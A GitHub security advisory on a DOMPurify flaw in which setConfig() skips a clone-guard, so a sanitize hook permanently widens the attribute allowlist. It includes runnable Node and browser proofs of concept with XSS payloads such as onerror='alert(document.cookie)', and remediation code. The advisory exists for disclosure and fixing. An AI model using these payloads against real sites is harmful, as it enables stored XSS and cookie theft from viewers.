GHSA-CMWH-PVXP-8882
Vulnerability from github – Published: 2026-06-18 14:27 – Updated: 2026-06-18 14:27Summary
DOMPurify 3.4.7 shipped a security fix ("permanent hook pollution") that makes a registered uponSanitizeAttribute hook's mutation of data.allowedAttributes non-persistent — so allowing an attribute for one element does not leak into later sanitize() calls. The fix clones ALLOWED_ATTR inside _parseConfig.
That guard is silently bypassed whenever the application uses the persistent-config API DOMPurify.setConfig(). setConfig() sets the module flag SET_CONFIG = true, which causes sanitize() to skip _parseConfig entirely — and the clone-guard lives inside _parseConfig. The hook is then handed the live, shared ALLOWED_ATTR object; any data.allowedAttributes[name] = true it writes mutates that shared object permanently, for the lifetime of the DOMPurify instance, across every subsequent call, and across all elements.
If an application uses setConfig() together with an uponSanitizeAttribute hook that conditionally allows a dangerous attribute (onerror, onclick, onmouseover, srcdoc, formaction, …) for "trusted" elements, then one trusted render permanently allows that attribute on untrusted, attacker-controlled content — yielding stored XSS in viewers' browsers. DOMPurify applies no separate /^on/ event-handler blocklist: attribute stripping is governed entirely by the allowlist, so a polluted allowlist is the only gate, and survival in the output is final.
Affected configuration (preconditions)
The vulnerability is triggered when an application does both:
- Calls
DOMPurify.setConfig(...)once (the recommended pattern for a fixed, persistent policy), and - Registers an
uponSanitizeAttributehook that writesdata.allowedAttributes[name] = trueto conditionally allow an attribute (e.g. only for elements bearing a trust marker).
This hook pattern is demonstrated in DOMPurify's own test suite, and the per-call variant of exactly this leak is what 3.4.7 was released to fix.
Root cause (source: src/purify.ts, v3.4.10)
The 3.4.7 clone-guard — only inside _parseConfig:
// src/purify.ts _parseConfig() (lines ~950-968)
// "if a hook is registered AND the set still points at the default constant, clone it.
// The hook then mutates the clone ... and the next default-cfg call rebinds to the untouched original."
if ( ... && hooks.uponSanitizeAttribute.length > 0) {
ALLOWED_TAGS = clone(ALLOWED_TAGS); // line 961
}
if ( ... hooks.uponSanitizeAttribute.length > 0 ... ) {
ALLOWED_ATTR = clone(ALLOWED_ATTR); // line 968
}
sanitize() skips _parseConfig on the persistent-config path:
// src/purify.ts DOMPurify.sanitize() (line 2369)
if (!SET_CONFIG) {
_parseConfig(cfg); // <-- clone-guard lives in here; SKIPPED when SET_CONFIG is true
}
setConfig() sets the flag that disables the guard:
// src/purify.ts (lines 2596-2598)
DOMPurify.setConfig = function (cfg = {}) {
_parseConfig(cfg);
SET_CONFIG = true; // every later sanitize() now skips _parseConfig
};
The hook is handed the live allowlist binding, and there is no secondary event-handler defense:
// src/purify.ts (line 2088) — hook event exposes the shared object by reference
allowedAttributes: ALLOWED_ATTR,
// (line 2108) hooks.uponSanitizeAttribute executed; a write to data.allowedAttributes mutates ALLOWED_ATTR itself
// _isValidAttribute gates purely on ALLOWED_ATTR[lcName]; DOMPurify uses NO /^on/ blocklist by design.
Net: after setConfig(), the clone-guard never runs, so the hook's allowedAttributes mutation is a permanent write to the instance's shared ALLOWED_ATTR.
Proof of Concept
Environment: npm i dompurify@3.4.10 jsdom (Node; identical mechanism to isomorphic-dompurify, and to a browser instance).
PoC 1 — the leak (trusted render permanently allows onerror on attacker content)
const createDOMPurify = require('dompurify');
const { JSDOM } = require('jsdom');
const DP = createDOMPurify(new JSDOM('').window);
// App init: persistent policy + a hook that allows onerror ONLY for trusted, pre-vetted elements
DP.setConfig({ ALLOWED_TAGS: ['img'], ALLOWED_ATTR: ['src'] });
DP.addHook('uponSanitizeAttribute', (node, data) => {
if (node.getAttribute && node.getAttribute('data-trusted') === '1') {
data.allowedAttributes['onerror'] = true; // intended: trusted-only
}
});
// 1) A trusted widget is rendered once
DP.sanitize('<img data-trusted="1" src="x" onerror="loadWidget()">');
// 2) Later, ATTACKER-controlled content (NO data-trusted) is sanitized on the same instance
console.log(DP.sanitize('<img src="x" onerror="alert(document.cookie)">'));
// OUTPUT: <img src="x" onerror="alert(document.cookie)"> <-- onerror SURVIVES -> XSS
PoC 2 — it is a DOMPurify state-leak, not "the app allowed on*" (attribute-agnostic)
// Same setConfig + hook shape, but the hook allows a BENIGN attribute (title).
// The leak is identical -> the defect is a shared-state mutation in DOMPurify,
// independent of which attribute the hook touches.
DP.setConfig({ ALLOWED_TAGS: ['span'], ALLOWED_ATTR: [] });
DP.addHook('uponSanitizeAttribute', (n, d) => {
if (n.getAttribute && n.getAttribute('data-trusted') === '1') d.allowedAttributes['title'] = true;
});
DP.sanitize('<span data-trusted="1" title="ok">x</span>');
console.log(DP.sanitize('<span title="leaked">x</span>')); // -> <span title="leaked">x</span> (leaked)
PoC 3 — control: WITHOUT setConfig() the 3.4.7 guard holds
const DP2 = createDOMPurify(new JSDOM('').window);
DP2.addHook('uponSanitizeAttribute', (n, d) => {
if (n.getAttribute && n.getAttribute('data-trusted') === '1') d.allowedAttributes['onerror'] = true;
});
DP2.sanitize('<img data-trusted="1" src="x" onerror="ok()">', { ALLOWED_TAGS: ['img'], ALLOWED_ATTR: ['src'] });
console.log(DP2.sanitize('<img src="x" onerror="alert(1)">', { ALLOWED_TAGS: ['img'], ALLOWED_ATTR: ['src'] }));
// OUTPUT: <img src="x"> <-- onerror correctly STRIPPED. setConfig() is the trigger.
Persistence (observed)
- The leak persists after
removeAllHooks()— removing the hook does not clean the polluted allowlist. - It is global / cross-element — a polluted
onmouseoversurvives on<a>and<div>, not only the originally-blessed<img>. - It persists for the instance lifetime (survived 5/5 subsequent default calls).
clearConfig()does restore a clean state (this is the bound of the impact).
Impact
Stored XSS. In a long-lived (e.g. server-side / isomorphic-dompurify) DOMPurify instance, a single trusted render flips a shared allowlist bit; every subsequent untrusted submission then inherits a live event-handler attribute and executes script in viewers' browsers. Because DOMPurify enforces no /^on/ blocklist, a surviving on* attribute is final — no secondary control prevents execution. onerror on a broken-src <img> fires with no user interaction (browser-confirmed; see Validation).
Per-call FORBID_ATTR does not mitigate. A defensive sanitize(input, { FORBID_ATTR: ['onerror'] }) is also ignored once setConfig() has been called: the per-call config is parsed by _parseConfig, which sanitize() skips entirely under SET_CONFIG. So an application cannot blunt the leak with a per-call denylist — the poisoned ALLOWED_ATTR is the sole gate.
Realistic attack scenario
A platform mixes admin-authored interactive widgets with user-generated content through one sanitizer instance:
- The app installs a persistent baseline policy via
setConfig({ ALLOWED_TAGS: [...], ALLOWED_ATTR: [...] }). - It registers an
uponSanitizeAttributehook that enables an event handler only for admin-vetted elements markeddata-trusted="1", intending safe rich interactivity — a pattern the 3.4.7 fix was specifically meant to make safe. - An admin renders one trusted widget. From that point on, every user-submitted comment/post containing
<img src=x onerror=...>passes sanitization and executes for all viewers.
Remediation
Extend the existing clone-guard to the persistent-config (SET_CONFIG) fast-path: when sanitize() skips _parseConfig but an uponSanitizeAttribute hook is registered, clone the allowlists before the walk so hook mutations cannot persist — the exact analogue of the guard already present in _parseConfig.
// In DOMPurify.sanitize(), replacing the bare `if (!SET_CONFIG) { _parseConfig(cfg); }`:
if (!SET_CONFIG) {
_parseConfig(cfg);
} else if (hooks.uponSanitizeAttribute.length > 0) {
// Persistent-config path: _parseConfig (and its clone-guard) is skipped, so a hook would
// otherwise mutate the shared ALLOWED_ATTR/ALLOWED_TAGS permanently. Clone per call.
if (ALLOWED_ATTR === DEFAULT_ALLOWED_ATTR || ALLOWED_ATTR === currentSetConfigAttr) {
ALLOWED_ATTR = clone(ALLOWED_ATTR);
}
if (ALLOWED_TAGS === DEFAULT_ALLOWED_TAGS || ALLOWED_TAGS === currentSetConfigTags) {
ALLOWED_TAGS = clone(ALLOWED_TAGS);
}
}
(Equivalently: in the hook-event builder at line ~2088, hand the hook a shallow clone of ALLOWED_ATTR/ALLOWED_TAGS whenever SET_CONFIG is true, mirroring the 3.4.7 intent.)
A regression test should reproduce PoC 1 and assert the attacker call returns <img src="x">. Note the existing 3.4.7 regression test ("unguarded attribute hook does not poison subsequent default-config calls") never exercises setConfig() — adding a setConfig variant closes the gap.
Application-side mitigation until patched: prefer data.keepAttr = true (per-element, non-persistent) over data.allowedAttributes[name] = true inside hooks; or call DOMPurify.clearConfig() between trust domains; or use separate DOMPurify instances for trusted vs. untrusted content.
Limitations
- Requires the two-part precondition above (persistent
setConfig()and a hook writingdata.allowedAttributes[...]). Not a default-config bypass. - Impact is bounded by
clearConfig(), which restores a clean state. The earlier-considered "survivesclearConfig()" claim did not reproduce and is withdrawn. - A position could be adopted to "use
data.keepAttr=true, notallowedAttributes[]." However, the 3.4.7 security fix exists precisely to defend theallowedAttributes[]hook pattern in the per-call path; leaving thesetConfigpath unguarded is an incomplete fix of an acknowledged security issue.
Validation
- Integrity: the tested
dompurify@3.4.10dist/purify.cjs.js(md5ab0e7b1cde1cbcace0f62b6aac284143) and browserdist/purify.min.js(md5b0985f80fa48e6e7b263f8f6a64b779e) are byte-identical to a freshlynpm pack-ed release — the repro is on the real shipped code. Mechanism identical on 3.4.0, 3.4.9 and 3.4.10. - Node (mechanism): PoCs 1–3 reproduce deterministically;
DOMPurify.isValidAttribute('img','onerror','x')flipsfalse → trueafter a single trusted render undersetConfig(), proving the shared attribute gate is poisoned. Leak survivesremoveAllHooks(), is cross-element, persists for the instance lifetime, and is reset only byclearConfig(). - Real browser (impact): in Chrome with DOMPurify 3.4.10, assigning the attacker output to
innerHTMLexecutes the survivingonerror(sentinelwindow.__fired = ["ATTACKER-onerror"];onerrorDOM property is afunction), with no user interaction. The no-setConfigA/B control does not fire — execution is attributable to thesetConfigleak, not a harness artifact.
Appendix A — Node PoC (complete, runnable)
// poc.js — npm i dompurify@3.4.10 jsdom && node poc.js
const createDOMPurify = require('dompurify');
const { JSDOM } = require('jsdom');
const freshDP = () => createDOMPurify(new JSDOM('').window);
const log = (s) => console.log(s);
log('DOMPurify ' + freshDP().version + '\n');
// PoC 1 — the leak: trusted render permanently allows onerror on attacker content
{
const DP = freshDP();
DP.setConfig({ ALLOWED_TAGS: ['img'], ALLOWED_ATTR: ['src'] });
DP.addHook('uponSanitizeAttribute', (node, data) => {
if (node.getAttribute && node.getAttribute('data-trusted') === '1') {
data.allowedAttributes['onerror'] = true; // intended: trusted-only
}
});
DP.sanitize('<img data-trusted="1" src="x" onerror="loadWidget()">'); // trusted render
const attacker = DP.sanitize('<img src="x" onerror="alert(document.cookie)">'); // attacker, no data-trusted
log('[PoC1] attacker output : ' + attacker);
log('[PoC1] onerror survived : ' + /onerror/.test(attacker));
log('[PoC1] isValidAttribute(img,onerror) -> ' + DP.isValidAttribute('img','onerror','x') + ' (shared gate poisoned)\n');
}
// PoC 2 — attribute-agnostic: a DOMPurify state-leak, not "the app allowed on*"
{
const DP = freshDP();
DP.setConfig({ ALLOWED_TAGS: ['span'], ALLOWED_ATTR: [] });
DP.addHook('uponSanitizeAttribute', (n, d) => {
if (n.getAttribute && n.getAttribute('data-trusted') === '1') d.allowedAttributes['title'] = true;
});
DP.sanitize('<span data-trusted="1" title="ok">x</span>');
log('[PoC2] benign title leaks: ' + DP.sanitize('<span title="leaked">x</span>') + '\n');
}
// PoC 3 — control: WITHOUT setConfig the 3.4.7 guard holds
{
const DP = freshDP();
DP.addHook('uponSanitizeAttribute', (n, d) => {
if (n.getAttribute && n.getAttribute('data-trusted') === '1') d.allowedAttributes['onerror'] = true;
});
DP.sanitize('<img data-trusted="1" src="x" onerror="ok()">', { ALLOWED_TAGS:['img'], ALLOWED_ATTR:['src'] });
const ctrl = DP.sanitize('<img src="x" onerror="alert(1)">', { ALLOWED_TAGS:['img'], ALLOWED_ATTR:['src'] });
log('[PoC3] control output : ' + ctrl + ' stripped: ' + !/onerror/.test(ctrl) + '\n');
}
// Persistence: survives removeAllHooks(); reset only by clearConfig()
{
const DP = freshDP();
DP.setConfig({ ALLOWED_TAGS: ['img'], ALLOWED_ATTR: ['src'] });
DP.addHook('uponSanitizeAttribute', (n, d) => {
if (n.getAttribute && n.getAttribute('data-trusted') === '1') d.allowedAttributes['onerror'] = true;
});
DP.sanitize('<img data-trusted="1" src="x" onerror="ok()">');
DP.removeAllHooks();
let leaks = 0;
for (let i = 0; i < 5; i++) if (/onerror/.test(DP.sanitize('<img src="x" onerror="alert('+i+')">'))) leaks++;
log('[persist] survived ' + leaks + '/5 calls after removeAllHooks()');
DP.clearConfig();
log('[persist] after clearConfig(): ' + DP.sanitize('<img src="x" onerror="alert(1)">') + ' (reset)');
}
Expected output:
[PoC1] attacker output : <img src="x" onerror="alert(document.cookie)">
[PoC1] onerror survived : true
[PoC1] isValidAttribute(img,onerror) -> true (shared gate poisoned)
[PoC2] benign title leaks: <span title="leaked">x</span>
[PoC3] control output : <img src="x"> stripped: true
[persist] survived 5/5 calls after removeAllHooks()
[persist] after clearConfig(): <img src="x"> (reset)
Appendix B — Browser PoC (complete; confirms execution)
<!doctype html><html><head><meta charset="utf-8">
<script src="https://cdn.jsdelivr.net/npm/dompurify@3.4.10/dist/purify.min.js"></script>
</head><body><pre id="out"></pre>
<script>
const log = (s) => document.getElementById('out').textContent += s + '\n';
window.__fired = [];
window.alert = (x) => window.__fired.push('alert:' + x); // sentinel: capture exec, no modal
log('DOMPurify ' + DOMPurify.version);
// App init: persistent policy + a hook allowing onerror ONLY for trusted elements
DOMPurify.setConfig({ ALLOWED_TAGS: ['img'], ALLOWED_ATTR: ['src'] });
DOMPurify.addHook('uponSanitizeAttribute', (node, data) => {
if (node.getAttribute && node.getAttribute('data-trusted') === '1') data.allowedAttributes['onerror'] = true;
});
DOMPurify.sanitize('<img data-trusted="1" src="x" onerror="0">'); // one trusted render
const out = DOMPurify.sanitize('<img src="x" onerror="alert(\'XSS:\'+document.domain)">'); // attacker
log('attacker sanitized output: ' + out);
const host = document.createElement('div');
host.innerHTML = out; // surviving onerror arms on the broken-src img
document.body.appendChild(host);
setTimeout(() => {
log('handlers fired: ' + JSON.stringify(window.__fired));
log(window.__fired.length ? 'RESULT: XSS EXECUTED' : 'RESULT: no execution');
}, 500);
</script></body></html>
Observed: handlers fired: ["alert:XSS:<domain>"] → RESULT: XSS EXECUTED (no user interaction). The same harness without the setConfig() line strips onerror and does not fire.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.4.10"
},
"package": {
"ecosystem": "npm",
"name": "dompurify"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.4.11"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-471",
"CWE-665",
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-18T14:27:37Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "## Summary\n\nDOMPurify 3.4.7 shipped a security fix (\"permanent hook pollution\") that makes a registered `uponSanitizeAttribute` hook\u0027s mutation of `data.allowedAttributes` **non-persistent** \u2014 so allowing an attribute for one element does not leak into later `sanitize()` calls. The fix clones `ALLOWED_ATTR` inside `_parseConfig`.\n\nThat guard is **silently bypassed whenever the application uses the persistent-config API `DOMPurify.setConfig()`.** `setConfig()` sets the module flag `SET_CONFIG = true`, which causes `sanitize()` to **skip `_parseConfig` entirely** \u2014 and the clone-guard lives inside `_parseConfig`. The hook is then handed the **live, shared `ALLOWED_ATTR` object**; any `data.allowedAttributes[name] = true` it writes mutates that shared object **permanently**, for the lifetime of the DOMPurify instance, across every subsequent call, and across **all** elements.\n\nIf an application uses `setConfig()` together with an `uponSanitizeAttribute` hook that conditionally allows a dangerous attribute (`onerror`, `onclick`, `onmouseover`, `srcdoc`, `formaction`, \u2026) for \"trusted\" elements, then **one trusted render permanently allows that attribute on untrusted, attacker-controlled content** \u2014 yielding stored XSS in viewers\u0027 browsers. DOMPurify applies no separate `/^on/` event-handler blocklist: attribute stripping is governed entirely by the allowlist, so a polluted allowlist is the only gate, and survival in the output is final.\n\n---\n\n## Affected configuration (preconditions)\n\nThe vulnerability is triggered when an application does **both**:\n\n1. Calls `DOMPurify.setConfig(...)` once (the recommended pattern for a fixed, persistent policy), **and**\n2. Registers an `uponSanitizeAttribute` hook that writes `data.allowedAttributes[name] = true` to conditionally allow an attribute (e.g. only for elements bearing a trust marker).\n\nThis hook pattern is demonstrated in DOMPurify\u0027s own test suite, and the per-call variant of exactly this leak is what 3.4.7 was released to fix.\n\n---\n\n## Root cause (source: `src/purify.ts`, v3.4.10)\n\nThe 3.4.7 clone-guard \u2014 only inside `_parseConfig`:\n\n```\n// src/purify.ts _parseConfig() (lines ~950-968)\n// \"if a hook is registered AND the set still points at the default constant, clone it.\n// The hook then mutates the clone ... and the next default-cfg call rebinds to the untouched original.\"\nif ( ... \u0026\u0026 hooks.uponSanitizeAttribute.length \u003e 0) {\n ALLOWED_TAGS = clone(ALLOWED_TAGS); // line 961\n}\nif ( ... hooks.uponSanitizeAttribute.length \u003e 0 ... ) {\n ALLOWED_ATTR = clone(ALLOWED_ATTR); // line 968\n}\n```\n\n`sanitize()` skips `_parseConfig` on the persistent-config path:\n\n```\n// src/purify.ts DOMPurify.sanitize() (line 2369)\nif (!SET_CONFIG) {\n _parseConfig(cfg); // \u003c-- clone-guard lives in here; SKIPPED when SET_CONFIG is true\n}\n```\n\n`setConfig()` sets the flag that disables the guard:\n\n```\n// src/purify.ts (lines 2596-2598)\nDOMPurify.setConfig = function (cfg = {}) {\n _parseConfig(cfg);\n SET_CONFIG = true; // every later sanitize() now skips _parseConfig\n};\n```\n\nThe hook is handed the **live** allowlist binding, and there is no secondary event-handler defense:\n\n```\n// src/purify.ts (line 2088) \u2014 hook event exposes the shared object by reference\nallowedAttributes: ALLOWED_ATTR,\n// (line 2108) hooks.uponSanitizeAttribute executed; a write to data.allowedAttributes mutates ALLOWED_ATTR itself\n// _isValidAttribute gates purely on ALLOWED_ATTR[lcName]; DOMPurify uses NO /^on/ blocklist by design.\n```\n\n**Net:** after `setConfig()`, the clone-guard never runs, so the hook\u0027s `allowedAttributes` mutation is a permanent write to the instance\u0027s shared `ALLOWED_ATTR`.\n\n---\n\n## Proof of Concept\n\nEnvironment: `npm i dompurify@3.4.10 jsdom` (Node; identical mechanism to `isomorphic-dompurify`, and to a browser instance).\n\n### PoC 1 \u2014 the leak (trusted render permanently allows `onerror` on attacker content)\n\n```js\nconst createDOMPurify = require(\u0027dompurify\u0027);\nconst { JSDOM } = require(\u0027jsdom\u0027);\nconst DP = createDOMPurify(new JSDOM(\u0027\u0027).window);\n\n// App init: persistent policy + a hook that allows onerror ONLY for trusted, pre-vetted elements\nDP.setConfig({ ALLOWED_TAGS: [\u0027img\u0027], ALLOWED_ATTR: [\u0027src\u0027] });\nDP.addHook(\u0027uponSanitizeAttribute\u0027, (node, data) =\u003e {\n if (node.getAttribute \u0026\u0026 node.getAttribute(\u0027data-trusted\u0027) === \u00271\u0027) {\n data.allowedAttributes[\u0027onerror\u0027] = true; // intended: trusted-only\n }\n});\n\n// 1) A trusted widget is rendered once\nDP.sanitize(\u0027\u003cimg data-trusted=\"1\" src=\"x\" onerror=\"loadWidget()\"\u003e\u0027);\n\n// 2) Later, ATTACKER-controlled content (NO data-trusted) is sanitized on the same instance\nconsole.log(DP.sanitize(\u0027\u003cimg src=\"x\" onerror=\"alert(document.cookie)\"\u003e\u0027));\n// OUTPUT: \u003cimg src=\"x\" onerror=\"alert(document.cookie)\"\u003e \u003c-- onerror SURVIVES -\u003e XSS\n```\n\n### PoC 2 \u2014 it is a DOMPurify state-leak, not \"the app allowed `on*`\" (attribute-agnostic)\n\n```js\n// Same setConfig + hook shape, but the hook allows a BENIGN attribute (title).\n// The leak is identical -\u003e the defect is a shared-state mutation in DOMPurify,\n// independent of which attribute the hook touches.\nDP.setConfig({ ALLOWED_TAGS: [\u0027span\u0027], ALLOWED_ATTR: [] });\nDP.addHook(\u0027uponSanitizeAttribute\u0027, (n, d) =\u003e {\n if (n.getAttribute \u0026\u0026 n.getAttribute(\u0027data-trusted\u0027) === \u00271\u0027) d.allowedAttributes[\u0027title\u0027] = true;\n});\nDP.sanitize(\u0027\u003cspan data-trusted=\"1\" title=\"ok\"\u003ex\u003c/span\u003e\u0027);\nconsole.log(DP.sanitize(\u0027\u003cspan title=\"leaked\"\u003ex\u003c/span\u003e\u0027)); // -\u003e \u003cspan title=\"leaked\"\u003ex\u003c/span\u003e (leaked)\n```\n\n### PoC 3 \u2014 control: WITHOUT `setConfig()` the 3.4.7 guard holds\n\n```js\nconst DP2 = createDOMPurify(new JSDOM(\u0027\u0027).window);\nDP2.addHook(\u0027uponSanitizeAttribute\u0027, (n, d) =\u003e {\n if (n.getAttribute \u0026\u0026 n.getAttribute(\u0027data-trusted\u0027) === \u00271\u0027) d.allowedAttributes[\u0027onerror\u0027] = true;\n});\nDP2.sanitize(\u0027\u003cimg data-trusted=\"1\" src=\"x\" onerror=\"ok()\"\u003e\u0027, { ALLOWED_TAGS: [\u0027img\u0027], ALLOWED_ATTR: [\u0027src\u0027] });\nconsole.log(DP2.sanitize(\u0027\u003cimg src=\"x\" onerror=\"alert(1)\"\u003e\u0027, { ALLOWED_TAGS: [\u0027img\u0027], ALLOWED_ATTR: [\u0027src\u0027] }));\n// OUTPUT: \u003cimg src=\"x\"\u003e \u003c-- onerror correctly STRIPPED. setConfig() is the trigger.\n```\n\n### Persistence (observed)\n\n- The leak **persists after `removeAllHooks()`** \u2014 removing the hook does not clean the polluted allowlist.\n- It is **global / cross-element** \u2014 a polluted `onmouseover` survives on `\u003ca\u003e` and `\u003cdiv\u003e`, not only the originally-blessed `\u003cimg\u003e`.\n- It persists for the **instance lifetime** (survived 5/5 subsequent default calls).\n- `clearConfig()` **does** restore a clean state (this is the bound of the impact).\n\n---\n\n## Impact\n\nStored XSS. In a long-lived (e.g. server-side / `isomorphic-dompurify`) DOMPurify instance, a single trusted render flips a shared allowlist bit; every subsequent untrusted submission then inherits a live event-handler attribute and executes script in viewers\u0027 browsers. Because DOMPurify enforces no `/^on/` blocklist, a surviving `on*` attribute is final \u2014 no secondary control prevents execution. `onerror` on a broken-`src` `\u003cimg\u003e` fires with no user interaction (browser-confirmed; see Validation).\n\n**Per-call `FORBID_ATTR` does not mitigate.** A defensive `sanitize(input, { FORBID_ATTR: [\u0027onerror\u0027] })` is also ignored once `setConfig()` has been called: the per-call config is parsed by `_parseConfig`, which `sanitize()` skips entirely under `SET_CONFIG`. So an application cannot blunt the leak with a per-call denylist \u2014 the poisoned `ALLOWED_ATTR` is the sole gate.\n\n---\n\n## Realistic attack scenario\n\nA platform mixes admin-authored interactive widgets with user-generated content through one sanitizer instance:\n\n1. The app installs a persistent baseline policy via `setConfig({ ALLOWED_TAGS: [...], ALLOWED_ATTR: [...] })`.\n2. It registers an `uponSanitizeAttribute` hook that enables an event handler **only** for admin-vetted elements marked `data-trusted=\"1\"`, intending safe rich interactivity \u2014 a pattern the 3.4.7 fix was specifically meant to make safe.\n3. An admin renders one trusted widget. From that point on, every user-submitted comment/post containing `\u003cimg src=x onerror=...\u003e` passes sanitization and executes for all viewers.\n\n---\n\n## Remediation\n\nExtend the existing clone-guard to the persistent-config (`SET_CONFIG`) fast-path: when `sanitize()` skips `_parseConfig` but an `uponSanitizeAttribute` hook is registered, clone the allowlists before the walk so hook mutations cannot persist \u2014 the exact analogue of the guard already present in `_parseConfig`.\n\n```js\n// In DOMPurify.sanitize(), replacing the bare `if (!SET_CONFIG) { _parseConfig(cfg); }`:\nif (!SET_CONFIG) {\n _parseConfig(cfg);\n} else if (hooks.uponSanitizeAttribute.length \u003e 0) {\n // Persistent-config path: _parseConfig (and its clone-guard) is skipped, so a hook would\n // otherwise mutate the shared ALLOWED_ATTR/ALLOWED_TAGS permanently. Clone per call.\n if (ALLOWED_ATTR === DEFAULT_ALLOWED_ATTR || ALLOWED_ATTR === currentSetConfigAttr) {\n ALLOWED_ATTR = clone(ALLOWED_ATTR);\n }\n if (ALLOWED_TAGS === DEFAULT_ALLOWED_TAGS || ALLOWED_TAGS === currentSetConfigTags) {\n ALLOWED_TAGS = clone(ALLOWED_TAGS);\n }\n}\n```\n\n(Equivalently: in the hook-event builder at line ~2088, hand the hook a shallow clone of `ALLOWED_ATTR`/`ALLOWED_TAGS` whenever `SET_CONFIG` is true, mirroring the 3.4.7 intent.)\n\nA regression test should reproduce PoC 1 and assert the attacker call returns `\u003cimg src=\"x\"\u003e`. Note the existing 3.4.7 regression test (\"unguarded attribute hook does not poison subsequent default-config calls\") never exercises `setConfig()` \u2014 adding a `setConfig` variant closes the gap.\n\n**Application-side mitigation until patched:** prefer `data.keepAttr = true` (per-element, non-persistent) over `data.allowedAttributes[name] = true` inside hooks; or call `DOMPurify.clearConfig()` between trust domains; or use separate DOMPurify instances for trusted vs. untrusted content.\n\n---\n\n## Limitations\n\n- Requires the two-part precondition above (persistent `setConfig()` **and** a hook writing `data.allowedAttributes[...]`). Not a default-config bypass.\n- Impact is bounded by `clearConfig()`, which restores a clean state. The earlier-considered \"survives `clearConfig()`\" claim did **not** reproduce and is withdrawn.\n- A position could be adopted to \"use `data.keepAttr=true`, not `allowedAttributes[]`.\" However, the 3.4.7 security fix exists precisely to defend the `allowedAttributes[]` hook pattern in the per-call path; leaving the `setConfig` path unguarded is an incomplete fix of an acknowledged security issue.\n\n## Validation\n\n- **Integrity:** the tested `dompurify@3.4.10` `dist/purify.cjs.js` (md5 `ab0e7b1cde1cbcace0f62b6aac284143`) and browser `dist/purify.min.js` (md5 `b0985f80fa48e6e7b263f8f6a64b779e`) are byte-identical to a freshly `npm pack`-ed release \u2014 the repro is on the real shipped code. Mechanism identical on 3.4.0, 3.4.9 and 3.4.10.\n- **Node (mechanism):** PoCs 1\u20133 reproduce deterministically; `DOMPurify.isValidAttribute(\u0027img\u0027,\u0027onerror\u0027,\u0027x\u0027)` flips `false \u2192 true` after a single trusted render under `setConfig()`, proving the shared attribute gate is poisoned. Leak survives `removeAllHooks()`, is cross-element, persists for the instance lifetime, and is reset only by `clearConfig()`.\n- **Real browser (impact):** in Chrome with DOMPurify 3.4.10, assigning the attacker output to `innerHTML` **executes** the surviving `onerror` (sentinel `window.__fired = [\"ATTACKER-onerror\"]`; `onerror` DOM property is a `function`), with no user interaction. The no-`setConfig` A/B control does not fire \u2014 execution is attributable to the `setConfig` leak, not a harness artifact.\n\n---\n\n## Appendix A \u2014 Node PoC (complete, runnable)\n\n```js\n// poc.js \u2014 npm i dompurify@3.4.10 jsdom \u0026\u0026 node poc.js\nconst createDOMPurify = require(\u0027dompurify\u0027);\nconst { JSDOM } = require(\u0027jsdom\u0027);\nconst freshDP = () =\u003e createDOMPurify(new JSDOM(\u0027\u0027).window);\nconst log = (s) =\u003e console.log(s);\nlog(\u0027DOMPurify \u0027 + freshDP().version + \u0027\\n\u0027);\n\n// PoC 1 \u2014 the leak: trusted render permanently allows onerror on attacker content\n{\n const DP = freshDP();\n DP.setConfig({ ALLOWED_TAGS: [\u0027img\u0027], ALLOWED_ATTR: [\u0027src\u0027] });\n DP.addHook(\u0027uponSanitizeAttribute\u0027, (node, data) =\u003e {\n if (node.getAttribute \u0026\u0026 node.getAttribute(\u0027data-trusted\u0027) === \u00271\u0027) {\n data.allowedAttributes[\u0027onerror\u0027] = true; // intended: trusted-only\n }\n });\n DP.sanitize(\u0027\u003cimg data-trusted=\"1\" src=\"x\" onerror=\"loadWidget()\"\u003e\u0027); // trusted render\n const attacker = DP.sanitize(\u0027\u003cimg src=\"x\" onerror=\"alert(document.cookie)\"\u003e\u0027); // attacker, no data-trusted\n log(\u0027[PoC1] attacker output : \u0027 + attacker);\n log(\u0027[PoC1] onerror survived : \u0027 + /onerror/.test(attacker));\n log(\u0027[PoC1] isValidAttribute(img,onerror) -\u003e \u0027 + DP.isValidAttribute(\u0027img\u0027,\u0027onerror\u0027,\u0027x\u0027) + \u0027 (shared gate poisoned)\\n\u0027);\n}\n\n// PoC 2 \u2014 attribute-agnostic: a DOMPurify state-leak, not \"the app allowed on*\"\n{\n const DP = freshDP();\n DP.setConfig({ ALLOWED_TAGS: [\u0027span\u0027], ALLOWED_ATTR: [] });\n DP.addHook(\u0027uponSanitizeAttribute\u0027, (n, d) =\u003e {\n if (n.getAttribute \u0026\u0026 n.getAttribute(\u0027data-trusted\u0027) === \u00271\u0027) d.allowedAttributes[\u0027title\u0027] = true;\n });\n DP.sanitize(\u0027\u003cspan data-trusted=\"1\" title=\"ok\"\u003ex\u003c/span\u003e\u0027);\n log(\u0027[PoC2] benign title leaks: \u0027 + DP.sanitize(\u0027\u003cspan title=\"leaked\"\u003ex\u003c/span\u003e\u0027) + \u0027\\n\u0027);\n}\n\n// PoC 3 \u2014 control: WITHOUT setConfig the 3.4.7 guard holds\n{\n const DP = freshDP();\n DP.addHook(\u0027uponSanitizeAttribute\u0027, (n, d) =\u003e {\n if (n.getAttribute \u0026\u0026 n.getAttribute(\u0027data-trusted\u0027) === \u00271\u0027) d.allowedAttributes[\u0027onerror\u0027] = true;\n });\n DP.sanitize(\u0027\u003cimg data-trusted=\"1\" src=\"x\" onerror=\"ok()\"\u003e\u0027, { ALLOWED_TAGS:[\u0027img\u0027], ALLOWED_ATTR:[\u0027src\u0027] });\n const ctrl = DP.sanitize(\u0027\u003cimg src=\"x\" onerror=\"alert(1)\"\u003e\u0027, { ALLOWED_TAGS:[\u0027img\u0027], ALLOWED_ATTR:[\u0027src\u0027] });\n log(\u0027[PoC3] control output : \u0027 + ctrl + \u0027 stripped: \u0027 + !/onerror/.test(ctrl) + \u0027\\n\u0027);\n}\n\n// Persistence: survives removeAllHooks(); reset only by clearConfig()\n{\n const DP = freshDP();\n DP.setConfig({ ALLOWED_TAGS: [\u0027img\u0027], ALLOWED_ATTR: [\u0027src\u0027] });\n DP.addHook(\u0027uponSanitizeAttribute\u0027, (n, d) =\u003e {\n if (n.getAttribute \u0026\u0026 n.getAttribute(\u0027data-trusted\u0027) === \u00271\u0027) 